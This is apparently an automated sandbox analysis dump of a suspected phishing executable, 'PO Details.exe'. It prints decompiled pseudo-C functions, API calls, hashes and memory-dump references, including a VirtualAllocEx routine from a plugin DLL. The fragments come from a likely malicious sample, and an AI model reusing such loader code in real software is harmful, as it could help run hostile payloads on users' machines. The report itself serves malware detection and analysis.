0x00402530
0x00402537
0x0040253a
0x00402925
0x00402540
0x00402543
0x0040255e
0x0040258e
0x0040258e
0x00402591
0x00402560
0x00402564
0x0040257d
0x00402584
0x00402587
0x00402566
0x00402569
0x00402574
0x004025ed
0x00000000
0x00000000
0x00000000
0x00402569
0x00402564
0x004025f4
0x004025f5
0x004025f5
0x00402bc5
0x00402bd1

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402553
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsm89AB.tmp,00000000,00000011,00000002), ref: 004025F5

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 56e4d4d613bd04b4b218fdf93facc56148b7a221993560d2564f1528257e3b52
Instruction ID: af493c066ab36ea8406690c3d62a07c4fb2ed7115def6bf4d18b774961f6c260
Opcode Fuzzy Hash: 56e4d4d613bd04b4b218fdf93facc56148b7a221993560d2564f1528257e3b52
Instruction Fuzzy Hash: CD116A71910209EBCF14DFA4CA589AEB774FF04354B20843BE402B62C0D3B88A44DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f50;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433eec =  *0x433eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c5196716ed2294a5b6683282f685902d4e4d655c798d26bf32279206d375a943
Instruction ID: f4b073df4371d13d5e47470e1508f1e4354d1df05d26164fcbedf483487d3525
Opcode Fuzzy Hash: c5196716ed2294a5b6683282f685902d4e4d655c798d26bf32279206d375a943
Instruction Fuzzy Hash: 4D01F4316242209FE7094B389D05B6A3698E710319F14823FF855F65F1EA78DC029B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 5b6eb51e974c6ffa25010b294a075ac5ec6cc0d8ab3a8806e3b9b7885e30bf9f
Instruction ID: 5d2b838fc97348560faaf82546316e7c29db3ee13ca796b15ebd5141c346d58e
Opcode Fuzzy Hash: 5b6eb51e974c6ffa25010b294a075ac5ec6cc0d8ab3a8806e3b9b7885e30bf9f
Instruction Fuzzy Hash: 6FE09A32A042009FD704EFA4AE484AEB3B4EB90325B20097FE401F20C1CBB85C008A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401573(void* __ebx) {
				int _t4;
				void* _t9;
				struct HWND__* _t11;
				struct HWND__* _t12;
				void* _t16;

				_t9 = __ebx;
				_t11 =  *0x433ed0; // 0x10398
				if(_t11 != __ebx) {
					ShowWindow(_t11,  *(_t16 - 0x2c)); // executed
					_t4 =  *(_t16 - 0x30);
				}
				_t12 =  *0x433ee4; // 0x10392
				if(_t12 != _t9) {
					ShowWindow(_t12, _t4); // executed
				}
				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}

0x00401573
0x00401573
0x00401581
0x00401587
0x00401589
0x00401589
0x0040158c
0x00401594
0x0040159c
0x0040159c
0x00402bc5
0x00402bd1

APIs

ShowWindow.USER32(00010398,?), ref: 00401587
ShowWindow.USER32(00010392), ref: 0040159C

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: ee6b34dc60ce046e7fc87c252979b9a5f26620d9aeb1dd86fb622a318af8ecd3
Instruction ID: fa776b8181dd7fe9ab65e8e076fc9876fffd29900cbf92d35bc205126ec889e9
Opcode Fuzzy Hash: ee6b34dc60ce046e7fc87c252979b9a5f26620d9aeb1dd86fb622a318af8ecd3
Instruction Fuzzy Hash: 03E0BF76B20114ABCB14DFA8ED908AE77B6EB94315724453BE502B32D0C6B5AD408F68

Uniqueness

Uniqueness Score: -1.00%

Function 00406806 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406806(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E00406796(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x0040680e
0x00406811
0x00406818
0x00406820
0x0040682c
0x00000000
0x00406833
0x00406823
0x0040682a
0x00000000
0x0040683b
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403537,0000000B), ref: 00406818
GetProcAddress.KERNEL32(00000000,?), ref: 00406833

Part of subcall function 00406796: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004067AD
Part of subcall function 00406796: wsprintfW.USER32 ref: 004067E8
Part of subcall function 00406796: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067FC

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
Instruction ID: c5f632ab0fd527bf8e68b4786b10832766149758e6d8e51d9ba55f9b7eb13659
Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
Instruction Fuzzy Hash: 30E0863350421056E211AA746E44C7B77A89F99750307843EF956F2080D738DC359679

Uniqueness

Uniqueness Score: -1.00%

Function 00405F07 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405F07(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405f0b
0x00405f18
0x00405f2d
0x00405f33

APIs

GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\PO Details.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405F0B
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F2D

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405EE2 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EE2(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405ee7
0x00405eed
0x00405ef2
0x00405efb
0x00405efb
0x00405f04

APIs

GetFileAttributesW.KERNELBASE(?,?,00405AE7,?,?,00000000,00405CBD,?,?,?,?), ref: 00405EE7
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405EFB

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 11a24c4abb36edafbee48cc994cb64d758a4bce1ebd63d049f972be52462095a
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: C7D0C9725045316BC2102728AF0889BBB55EB643717054A35F9A5A22B0CB314C528A98

Uniqueness

Uniqueness Score: -1.00%

Function 004059C5 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004059C5(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x004059cb
0x004059d3
0x00000000
0x004059d9
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004034B8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 004059CB
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059D9

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 1e5fcd6d8aa83e7c3539c134ce858d200345c8ad9b438ef6e258ac5dd368824a
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 27C04C71204541EEE6505B20AE09B177A909B50751F26843A6147F01A0DA388455E93D

Uniqueness

Uniqueness Score: -1.00%

Function 6E492AF8 Relevance: 1.6, APIs: 1, Instructions: 143
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E6E492AF8(intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				void* _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t69;
				intOrPtr _t70;
				signed int _t75;
				intOrPtr _t77;
				intOrPtr _t78;
				void* _t79;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				intOrPtr _t91;
				intOrPtr _t92;

				if( *0x6e495050 != 0 && E6E492A3B(_a4) == 0) {
					 *0x6e495054 = _t91;
					if( *0x6e49504c != 0) {
						_t91 =  *0x6e49504c;
					} else {
						E6E492A35();
						L6E493020();
						 *0x6e49504c = _t91;
					}
				}
				_t28 = E6E492A69(_a4);
				_t92 = _t91 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E6E492A5D();
					_t70 = _a4;
					_t77 =  *0x6e495058;
					 *((intOrPtr*)(_t29 + _t70)) = _t77;
					 *0x6e495058 = _t70;
					E6E492A57();
					_t33 = VirtualAllocEx(??, ??, ??, ??, ??); // executed
					 *0x6e495034 = _t33;
					 *0x6e495038 = _t77;
					if( *0x6e495050 != 0 && E6E492A3B( *0x6e495058) == 0) {
						 *0x6e49504c = _t92;
						_t92 =  *0x6e495054;
					}
					_t78 =  *0x6e495058;
					_a4 = _t78;
					 *0x6e495058 =  *((intOrPtr*)(E6E492A5D() + _t78));
					_t37 = E6E492A49(_t78);
					_pop(_t79);
					if(_t37 != 0) {
						_t40 = E6E492A69(_t79);
						if(_t40 > 0) {
							_push(_t40);
							_push(E6E492A74() + _a4 + _v8);
							_push(E6E492A7E());
							if( *0x6e495050 <= 0 || E6E492A3B(_a4) != 0) {
								_pop(_t86);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t86 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t87);
								_pop(_t49);
								 *0x6e49504c =  *0x6e49504c +  *(_t87 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t105 =  *0x6e495058;
					if( *0x6e495058 == 0) {
						 *0x6e49504c = 0;
					}
					E6E492AA2(_t105, _a4,  *0x6e495034,  *0x6e495038);
					return _a4;
				}
				_push(E6E492A74() + _a4);
				_t56 = E6E492A7A();
				_v8 = _t56;
				_t75 = _t28;
				_push(_t67 + _t56 * _t75);
				_t69 = E6E492A86();
				_t85 = E6E492A82();
				_t88 = E6E492A7E();
				_t61 = _t75;
				if( *((intOrPtr*)(_t88 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t69 + _t61)));
				}
				_push( *((intOrPtr*)(_t85 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x6e492b08
0x6e492b19
0x6e492b26
0x6e492b3a
0x6e492b28
0x6e492b28
0x6e492b2d
0x6e492b32
0x6e492b32
0x6e492b26
0x6e492b43
0x6e492b48
0x6e492b4e
0x6e492b92
0x6e492b92
0x6e492b97
0x6e492b9c
0x6e492ba2
0x6e492ba4
0x6e492baa
0x6e492bb7
0x6e492bb9
0x6e492bbe
0x6e492bcb
0x6e492bde
0x6e492be4
0x6e492bea
0x6e492beb
0x6e492bf1
0x6e492bfd
0x6e492c03
0x6e492c0b
0x6e492c0c
0x6e492c0f
0x6e492c1a
0x6e492c1c
0x6e492c28
0x6e492c2e
0x6e492c36
0x6e492c62
0x6e492c63
0x6e492c65
0x6e492c69
0x6e492c69
0x6e492c70
0x6e492c46
0x6e492c46
0x6e492c47
0x6e492c55
0x6e492c5e
0x6e492c5e
0x6e492c36
0x6e492c1a
0x6e492c72
0x6e492c79
0x6e492c7b
0x6e492c7b
0x6e492c94
0x6e492ca2
0x6e492ca2
0x6e492b59
0x6e492b5a
0x6e492b5f
0x6e492b63
0x6e492b68
0x6e492b7c
0x6e492b7d
0x6e492b7e
0x6e492b80
0x6e492b85
0x6e492b87
0x6e492b87
0x6e492b8a
0x6e492b90
0x00000000

APIs

VirtualAllocEx.KERNELBASE(00000000), ref: 6E492BB7

Memory Dump Source

Source File: 00000001.00000002.9314657277.000000006E491000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E490000, based on PE: true

Associated: 00000001.00000002.9314566108.000000006E490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314713092.000000006E494000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314753504.000000006E496000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e490000_PO Details.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1ff5cf25f7cadbea121d6c6e3ddcd5cd187d73ed2f7ce0f31d9273c91f4662fb
Instruction ID: ac77fd97909fa14b62b001be7638afb746c49116051c1c74a42d9c36bc02cee9
Opcode Fuzzy Hash: 1ff5cf25f7cadbea121d6c6e3ddcd5cd187d73ed2f7ce0f31d9273c91f4662fb
Instruction Fuzzy Hash: 0B417072900604DBDB20AFF5F985F993BACFB56315F20481BE404BB610DB389541EBE9

Uniqueness

Uniqueness Score: -1.00%

Function 02A83EF4 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

EnumWindows.USER32(?,?,00000092), ref: 02A83E91

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 31c58ca1a65746ee0abe98e49392c556c29732a5ad582a5008d490b911704165
Instruction ID: bb1bf9b2c5810da5c542bdd43f3bb56cda890e21d4f84b6246e5af4f15362acc
Opcode Fuzzy Hash: 31c58ca1a65746ee0abe98e49392c556c29732a5ad582a5008d490b911704165
Instruction Fuzzy Hash: 18F0813704D6C79FC70ADF34D81D0A9BFA1AF839147240ECD81608B951CA350115CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00402889 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00402889(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t19;

				_t15 = __edx;
				_pop(ds);
				if(__eflags != 0) {
					_t8 = E00402D1C(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
					_t10 = SetFilePointer(E00406371(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406358();
					}
				}
				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402889
0x00402889
0x0040288a
0x00402892
0x00402897
0x00402898
0x004028a7
0x004028b0
0x00402b04
0x00402b05
0x00402b08
0x00402b08
0x004028b0
0x00402bc5
0x00402bd1

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028A7

Part of subcall function 00406358: wsprintfW.USER32 ref: 00406365

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: d2438a08b7c9fc040b735ab31b03e2bcc427b44c184fb3c3378e52d46f067a51
Instruction ID: 502f0b54707076618778017ed9f863131a4a90ead78825dffa4163e62336b453
Opcode Fuzzy Hash: d2438a08b7c9fc040b735ab31b03e2bcc427b44c184fb3c3378e52d46f067a51
Instruction Fuzzy Hash: 7FE0ED72A10104AEDB01EFA5AA89CBE7379EB54318B24443BF511B10D1C6B95D519A2A

Uniqueness

Uniqueness Score: -1.00%

Function 004062AC Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062AC(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406203(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004062b6
0x004062bf
0x004062d5
0x00000000
0x004062d5
0x004062c3
0x00000000

APIs

